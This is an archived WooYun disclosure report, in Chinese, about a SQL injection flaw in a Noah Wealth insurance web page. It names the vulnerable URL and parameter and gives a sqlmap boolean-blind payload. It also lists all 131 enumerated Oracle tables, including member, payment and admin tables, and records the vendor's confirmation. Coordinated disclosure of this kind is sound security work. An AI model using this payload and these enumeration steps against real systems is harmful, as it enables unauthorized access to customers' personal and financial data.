当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154854

漏洞标题:诺亚财富某站存在SQL注入漏洞

相关厂商:诺亚财富

漏洞作者: 路人甲

提交时间:2015-11-23 13:28

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经确认,细节仅向厂商公开
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

详细说明:

http://insurance.noahwm.com/preSysApp/newSalesN/getCode.jsp?CodeType=bankcode

91.jpg

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: CodeType (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: CodeType=bankcode' AND 8336=8336 AND 'OyPF'='OyPF
---
web application technology: JSP
back-end DBMS: Oracle
Database: JSPGOU
[131 tables]
+-----------------------------+
| AGENTBINDING                |
| DH_PREMIUM_NETS             |
| ECORDER                     |
| ECORDER_20150716            |
| ECUSER                      |
| GTSY_PREMIUM_NETS           |
| JC_ADDRESS                  |
| JC_CORE_ADMIN               |
| JC_CORE_COUNTRY             |
| JC_CORE_GLOBAL              |
| JC_CORE_MEMBER              |
| JC_CORE_MESSAGE_TPL         |
| JC_CORE_PERMISSION          |
| JC_CORE_SOLUTION            |
| JC_CORE_USER                |
| JC_CORE_WEBSITE             |
| JC_DATA_BACKUP              |
| JC_INDUSTRY                 |
| JC_INFORMATION              |
| JC_QQ                       |
| JC_SHOP_ADMIN               |
| JC_SHOP_ADVERTISE           |
| JC_SHOP_ADVERTISE_ATTR      |
| JC_SHOP_ADVERTISE_SPACE     |
| JC_SHOP_ARTICLE             |
| JC_SHOP_ARTICLE_CONTENT     |
| JC_SHOP_BRAND               |
| JC_SHOP_BRAND_TEXT          |
| JC_SHOP_BUSINESS            |
| JC_SHOP_BUY_TYPES           |
| JC_SHOP_CARDGIFT            |
| JC_SHOP_CART                |
| JC_SHOP_CART_ITEM           |
| JC_SHOP_CATEGORY            |
| JC_SHOP_CHANNEL             |
| JC_SHOP_CHANNEL_CONTENT     |
| JC_SHOP_CHILDRENAGES        |
| JC_SHOP_COLLECT             |
| JC_SHOP_CONFIG              |
| JC_SHOP_CONSULT             |
| JC_SHOP_COUPON              |
| JC_SHOP_DICTIONARY          |
| JC_SHOP_DICTIONARY_TYPE     |
| JC_SHOP_DISCUSS             |
| JC_SHOP_FREIGHT             |
| JC_SHOP_FREIGHT_COUNTRY     |
| JC_SHOP_GIFT                |
| JC_SHOP_HABITS              |
| JC_SHOP_HABSTATUS           |
| JC_SHOP_KEYWORD_Q           |
| JC_SHOP_MEMBER              |
| JC_SHOP_MEMBERCOUPON        |
| JC_SHOP_MEMBER_ADDRESS      |
| JC_SHOP_MEMBER_BUYTYPES     |
| JC_SHOP_MEMBER_CHILDRENAGES |
| JC_SHOP_MEMBER_GROUP        |
| JC_SHOP_MEMBER_HABITATIONS  |
| JC_SHOP_MEMBER_HABITS       |
| JC_SHOP_ORDER               |
| JC_SHOP_ORDER_ITEM          |
| JC_SHOP_PAY                 |
| JC_SHOP_PAYMENT             |
| JC_SHOP_PCATEGORY_BRAND     |
| JC_SHOP_POSTER              |
| JC_SHOP_PRODUCT_EXT         |
| JC_SHOP_PRODUCT_FASHION     |
| JC_SHOP_PRODUCT_KEYWORD     |
| JC_SHOP_PRODUCT_TEXT        |
| JC_SHOP_PTYPE               |
| JC_SHOP_PTYPE_BRAND         |
| JC_SHOP_PTYPE_PROPERTY      |
| JC_SHOP_SHIPPING            |
| JC_SHOP_TAG                 |
| JORDERMESSAGE               |
| LCAPPNT                     |
| LCBNF                       |
| LCCONT                      |
| LCDUTY                      |
| LCGET                       |
| LCINSURED                   |
| LCPOL                       |
| LDADDRESS                   |
| LDCODE                      |
| LDCODEMAPPING               |
| LDCOM_MANAGE                |
| LDMAXNO                     |
| LDSYSVAR                    |
| LMDUTY                      |
| LMDUTY_0821                 |
| LMFIXWRAP                   |
| LMPLANWRAP                  |
| LMPLANWRAP_0821             |
| LMRISK                      |
| LMRISK_EXT                  |
| NSAPPLICANTCONFIG           |
| NSBENEFICIARYCONFIG         |
| NSCONFIG                    |
| NSCONTROL                   |
| NSINSAGETOAMOUNT            |
| NSINSAGETOTIMES             |
| NSINSURANCEINFORM           |
| NSMANAGECOM                 |
| NSPICTURECONFIG             |
| NSPINSUREDCONFIG            |
| NSPRODUCTCONFIG             |
| NSPRODUCTDESCRIB            |
| NSPRODUCTDETAIL             |
| NSPRODUCTDUTY               |
| NSPRODUCTINFO               |
| NSPRODUCTINFO_0807          |
| NSPRODUCTRULES              |
| NSPRODUCTTERMS              |
| NSRINSUREDCONFIG            |
| PAP_TARGETOBJECT            |
| PAYONLINE                   |
| PROVINCE                    |
| REFER_USER                  |
| RT_JYRS_AMNT                |
| SD_PREMIUM_NETS             |
| TK_RATE_40                  |
| TRADEINFO                   |
| TRADELOG                    |
| USERCONTBINDING             |
| USERRANDCODE                |
| WEIGHTSCOPE                 |
| WSCONFIGURE                 |
| WSDEALCLASSMAPPING          |
| WSDEALCLASSMAPPING_0821     |
| WSDEALCLIENTMAPPING         |
| WSDETAILLOG                 |
| WSDETAILLOGB                |
+-----------------------------+

88.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-11-24 13:12

厂商回复:

感谢对我公司信息安全的支持

最新状态:

暂无